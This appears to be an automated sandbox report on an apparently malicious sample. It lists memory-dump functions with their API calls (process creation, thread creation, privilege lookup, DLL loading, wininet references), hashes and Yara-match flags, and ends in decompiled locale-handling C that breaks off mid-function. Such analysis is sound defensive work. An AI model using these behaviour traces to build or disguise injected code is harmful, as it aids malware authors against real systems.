
Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0234FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FB5B

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0234FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FBC3

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0234F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234F90E

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0234F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234F9FB

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0234FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FEDB

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0234FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FFBF

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0234FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FC6B

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0234FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FD9A

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0234FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234FDCB

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 000972D0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00097378

Strings

net.dll, xrefs: 00097341, 000973C7, 0009739F, 000973AB, 000973D3
wininet.dll, xrefs: 0009732E, 00097337

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 27eea5c28efa56846e04df7fdcd754f7969483636c9b8de10e8924eb8f4a5ccb
Instruction ID: 65c3d31ed2305dc5a76d29537ad09dd46c808ba0fe1a1994c2e8e0e31fe978f3
Opcode Fuzzy Hash: 27eea5c28efa56846e04df7fdcd754f7969483636c9b8de10e8924eb8f4a5ccb
Instruction Fuzzy Hash: 0E3161B6505604ABCB25DF68C8A1FABB7F8EF48700F04811DF95D9B242D770A945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000972C7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00097378

Strings

net.dll, xrefs: 00097341, 0009739F, 000973AB
wininet.dll, xrefs: 0009732E, 00097337

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: aa4e60a9f67016b8f62a40fa24c3205c19340675f77a8f274b71329a6b194245
Instruction ID: fd889e75be2fe4e2a44c5dd0db52d7700ece25dca07682758dd08f49cd9eb067
Opcode Fuzzy Hash: aa4e60a9f67016b8f62a40fa24c3205c19340675f77a8f274b71329a6b194245
Instruction Fuzzy Hash: D32181B2605600ABDB14DF68C8A1FABB7F4FF48700F14812DF91D9B242D370A945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000988B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000988ED

Strings

.z`, xrefs: 000988DC, 000988E8

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: fb577c580f140c774de91f11b8bc0a00e42ac97be9b1401ed09f88cfedee0994
Instruction ID: cf63862a4cf32d604dbd03d460ee98fa6c2cd6373c627df5e08332c02577dfc7
Opcode Fuzzy Hash: fb577c580f140c774de91f11b8bc0a00e42ac97be9b1401ed09f88cfedee0994
Instruction Fuzzy Hash: DCF0AF712002146FCA10DFA9DC48DE777A9EF89220B008555F90C9B312C530E910CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 000988C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000988ED

Strings

.z`, xrefs: 000988DC, 000988E8

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 36b8d408deaa339e8ae1c72fd208a79468ed6cf9610c5a0c6c98e821003f2e4a
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: FEE012B1200208ABDB18EF99CC49EA777ADAF88750F018558BA085B252CA30E910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872FB

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
Instruction ID: 76137ffd9ee375fd82fb3786031b09c5070340f9f32425ac97783d936eb0b4c9
Opcode Fuzzy Hash: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
Instruction Fuzzy Hash: C301A731A8022877EB21B6949C03FFE776C6B01F50F140114FF04BA1C2EA946A0547F6

Uniqueness

Uniqueness Score: -1.00%

Function 0008D417, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D44B

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 13043c1ae9e5f58cdd06e220a3724ed38ae65ce52ee400aa66dc2267aca227c4
Instruction ID: 26eabe94f41dd8ed8d03d356751f88e201facf7791df88076c2af03cc068ca9a
Opcode Fuzzy Hash: 13043c1ae9e5f58cdd06e220a3724ed38ae65ce52ee400aa66dc2267aca227c4
Instruction Fuzzy Hash: B431E872A401187BEB14FB909C86FFA73ACFB54714F0442AAFD4857283E7749E5487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00089B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 0a12588c27eefc104df6827deb66a12df96b9a8d24a78904b543997f715d5111
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 820112B5D0010DBBDF10EAE4ED42FEDB7B8AB54704F044195A90897142F671EB14D791

Uniqueness

Uniqueness Score: -1.00%

Function 0009892D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
Instruction ID: 99582e8244165b0a772d2c863e1cbcfdb1d14207977794661f20e3e4ab86c71d
Opcode Fuzzy Hash: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
Instruction Fuzzy Hash: 7D01F2B2200108BFCB04DF89CC84EEB37ADAF8C354F158208FA0DA7245DA30E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098930, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 1fd74cbbb40c3e4ab12df46f30a16c429b8e682a02be56e035a93056b8f56152
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 2301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97255C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00097400, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009743C

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e8f7359f4bedd460e93fcc7b610fa5d401544a37555f2b0317736e19f5f75f0c
Instruction ID: b181a4dcf1d8f93b7329e89f277b44f520d4d4da9f2b3f901ac5d47a36cf2c57
Opcode Fuzzy Hash: e8f7359f4bedd460e93fcc7b610fa5d401544a37555f2b0317736e19f5f75f0c
Instruction Fuzzy Hash: ABE092733903043AE73065999C03FE7B39CCB81B20F550026FB0DEB2C2D595F80152A5

Uniqueness

Uniqueness Score: -1.00%

Function 00098A13, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 461ad38a56e1be1be9b57a1a35410789d1f4814218c2486d615b739fa0d42dad
Instruction ID: e7dde46fe51b2c67b5f915ca27ca74e02c02450088be42766884886a25a70813
Opcode Fuzzy Hash: 461ad38a56e1be1be9b57a1a35410789d1f4814218c2486d615b739fa0d42dad
Instruction Fuzzy Hash: FBF08CB2600204AFEB20DF99DC44EE737A9EF89360F048459F90C97301D931E8108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 000973F4, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009743C

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4f125925b0435a4dbbc4884746fe48f7711e42df2b6253a6bdaf93769d99ac95
Instruction ID: 7dedcdfe2516d14e6f7d3bed7edc313f7b9539ef22c6980a5e1d6ee082efd237
Opcode Fuzzy Hash: 4f125925b0435a4dbbc4884746fe48f7711e42df2b6253a6bdaf93769d99ac95
Instruction Fuzzy Hash: 10F0E5732842003AD7316658CC43FE7F7A8DF90B10F154229F64AAB2C2C6A1B90297A4

Uniqueness

Uniqueness Score: -1.00%

Function 00098A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 3d8cdf87c30b84d8b2e42dccf3f8830cb3c29f3efff65a99d061561c6976c6e6
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 1EE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA0857242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D44B

Memory Dump Source

Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction ID: 5ee596a1bfbfaa077a92055b3d8a9dc3091a8f25d82d4e0fe3606be2394aea5d
Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction Fuzzy Hash: 8AD0A7717503043BEA10FAA49C07F6673CD6B44B00F494074F948D73C3D964F9004565

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 4A7388D9, Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E4A7388D9() {
				signed int _v8;
				short _v264;
				int _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				int _t27;
				int _t35;
				void* _t59;
				void* _t60;
				intOrPtr* _t62;
				int _t63;
				signed int _t66;
				intOrPtr* _t71;
				intOrPtr _t72;
				int _t83;
				void* _t84;
				signed int _t85;

				_t25 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t25 ^ _t85;
				_t27 = E4A73756D();
				_t84 = GetLocaleInfoW;
				_v268 = _t27;
				if(GetLocaleInfoW(_t27, 0x1e, 0x4a754950, 8) == 0) {
					E4A73185A(0x4a754950, 8, E4A744E44);
				}
				if(GetLocaleInfoW(_v268, 0x23,  &_v264, 0x80) == 0) {
					L6:
					_push(E4A738B24);
					_t63 = 0x20;
					_push(_t63);
					_push(0x4a754bc0);
					E4A73185A();
					E4A73185A(0x4a754b80, _t63, E4A738B20);
					 *0x4a7541d0 =  *0x4a7541d0 & 0x00000000;
					_t35 = GetLocaleInfoW(_v268, 0x21,  &_v264, 0x80);
					_t66 = 2;
					if(_t35 != 0) {
						_t59 = (_v264 & 0x0000ffff) - 0x30;
						if(_t59 != 0) {
							_t60 = _t59 - 1;
							if(_t60 == 0) {
								 *0x4a7541d0 = 1;
								 *0x4a7541cc = L"dd/MM/yy";
							} else {
								if(_t60 == 1) {
									 *0x4a7541d0 = _t66;
									 *0x4a7541cc = L"yy/MM/dd";
								}
							}
						} else {
							 *0x4a7541d0 =  *0x4a7541d0 & 0x00000000;
							 *0x4a7541cc = L"MM/dd/yy";
						}
					}
					 *0x4a7541c8 = _t66;
					if(GetLocaleInfoW(_v268, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x4a7541c8 = 4;
					}
					if(GetLocaleInfoW(_v268, 0x1d, 0x4a754940, 8) == 0) {
						E4A73185A(0x4a754940, 8, 0x4a74bcb8);
					}
					if(GetLocaleInfoW(_v268, 0x31, 0x4a754d80, _t63) == 0) {
						E4A73185A(0x4a754d80, _t63, "Mon");
					}
					if(GetLocaleInfoW(_v268, 0x32, 0x4a754d40, _t63) == 0) {
						E4A73185A(0x4a754d40, _t63, "Tue");
					}
					if(GetLocaleInfoW(_v268, 0x33, 0x4a754d00, _t63) == 0) {
						E4A73185A(0x4a754d00, _t63, "Wed");
					}
					if(GetLocaleInfoW(_v268, 0x34, 0x4a754cc0, _t63) == 0) {
						E4A73185A(0x4a754cc0, _t63, "Thu");
					}
					if(GetLocaleInfoW(_v268, 0x35, 0x4a754c80, _t63) == 0) {
						E4A73185A(0x4a754c80, _t63, "Fri");
					}
					if(GetLocaleInfoW(_v268, 0x36, 0x4a754c40, _t63) == 0) {
						E4A73185A(0x4a754c40, _t63, "Sat");
					}
					if(GetLocaleInfoW(_v268, 0x37, 0x4a754c00, _t63) == 0) {
						E4A73185A(0x4a754c00, _t63, "Sun");
					}
					_t83 = 8;
					if(GetLocaleInfoW(_v268, 0xe, 0x4a754930, _t83) == 0) {
						E4A73185A(0x4a754930, _t83, E4A732EC4);
					}
					if(GetLocaleInfoW(_v268, 0xf, 0x4a754920, _t83) == 0) {
						_t56 = E4A73185A(0x4a754920, _t83, E4A744DE0);
					}
					__imp__setlocale(".OCP");
					return E4A7313A9(_t56, 0x4a754920, _v8 ^ _t85, _t72, _t83, _t84, 0);
				} else {
					_t71 = 0x4a738b28;
					_t62 =  &_v264;
					while(1) {
